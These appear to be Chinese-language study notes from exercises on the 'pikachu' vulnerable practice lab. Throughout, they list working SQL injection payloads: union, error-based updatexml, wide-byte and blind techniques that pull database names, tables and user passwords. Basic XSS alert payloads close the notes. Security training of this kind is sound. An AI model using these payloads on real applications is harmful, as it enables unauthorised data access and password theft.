SQL注入
文章目录
SQL注入
$query="select id,email from member where username='$name'";
$query="select id,email from member where username='vince'";
$query="select id,email from member where username='xx'";
$query="select id,email from member where username='xx' or 1=1#'";
$query="select id,email from member where username='xx' union select username,password from users#'";
#、-- 注释的意思
$query="select username,email from member where id=$id";
$query="select username,email from member where id=1";
$query="select username,email from member where id=1 or 1=1#";
$query="select username,email from member where id=1 and 1=1#";
$query="select username,email from member where id=1 and 1=2#";
$query="select username,email from member where id=1 union select username,password from users";
$query="select username,id,email from member where username like '%$name%'";
$query="select username,id,email from member where username like '%xx%’ or 1=1#%'";
报错注入:[mysql数据库中存在一个information_schema的默认数据库,这个库里面记录着整个mysql管理的数据库的名称、表名、字段名]
x' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)# 报数据库版本信息 0x7e 16进制
x' and updatexml(1,concat(0x7e,(select user()),0x7e),1)# 报数据库当前用户
x' and updatexml(1,concat(0x7e,(select database()),0x7e),1)# 报数据库
x' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#
报表名---
x' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' and table_schema='pikachu' limit 0,1)),0)#
报字段名
x' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0)#
报字段内容
增删改:页面没有回显信息
insert
$query="insert into member(username,pw,sex,phonenum,email,address) values('{$getdata['username']}',md5('{$getdata['password']}'),'{$getdata['sex']}','{$getdata['phonenum']}','{$getdata['email']}','{$getdata['add']}')";
x' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or'
使用报错注入的形式
update
x' and updatexml(1,concat(0x7e,(select password from users limit 0,1)),0) or'
使用报错注入的形式
delete
使用报错注入的形式
and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0)#
宽字节注入:(开发加了转义)
转义函数把字符如:‘、“、等自动在前面加上\,让这些符号的意义失效,或注释掉
$query="select id,email from member where username='xx\' or 1=1#'";
$query="select id,email from member where username='xx%df' or 1=1#'";
xx\' or 1=1# xx%5C%27+or+1%3D1%23
xx%df%5C%27+or+1%3D1%23
SQL盲注
$query="select id,email from member where username='vince'";
$query="select id,email from member where username='vince' and ascii(substr(database(),1,1))=112#'";
XSS跨站脚本漏洞
试探:'"<>123456
<script>alert("xss")</script>
存储型:每次刷新都会弹出,持久性伤害,所有访问该页面的用户都会中招
DOM型:
<a href='"+str+"'>what do you see?</a>
' οnclick="alert('xss')">
<a href='' οnclick="alert('xss')">'>what do you see?</a>
<a href='"+xss+"'>就让往事都随风,都随风吧</a>